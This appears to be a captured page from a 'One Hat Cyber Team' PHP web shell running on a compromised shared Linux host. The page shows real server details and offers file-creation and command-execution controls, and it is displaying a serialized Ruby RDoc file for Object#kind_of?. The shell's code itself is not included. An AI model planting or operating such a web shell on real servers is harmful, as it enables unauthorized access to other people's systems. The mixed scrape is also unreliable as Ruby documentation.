⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby19
/
share
/
ri
/
1.9.1
/
system
/
Object
/
View File Name :
kind_of%3f-i.ri
U:RDoc::AnyMethod[iI" kind_of?:ETI"Object#kind_of?;FF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I">Returns <code>true</code> if <i>class</i> is the class of;TI"A<i>obj</i>, or if <i>class</i> is one of the superclasses of;TI"2<i>obj</i> or modules included in <i>obj</i>.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"module M; end ;FI" class A ;FI" include M ;FI" end ;FI"class B < A; end ;FI"class C < B; end ;FI" ;FI"b = B.new ;FI"!b.is_a? A #=> true ;FI"!b.is_a? B #=> true ;FI""b.is_a? C #=> false ;FI"!b.is_a? M #=> true ;FI" ;FI"!b.kind_of? A #=> true ;FI"!b.kind_of? B #=> true ;FI""b.kind_of? C #=> false ;FI" b.kind_of? M #=> true;F: @file0I"Vobj.is_a?(class) -> true or false obj.kind_of?(class) -> true or false ;T0[ I" (p1);FI" object.c;T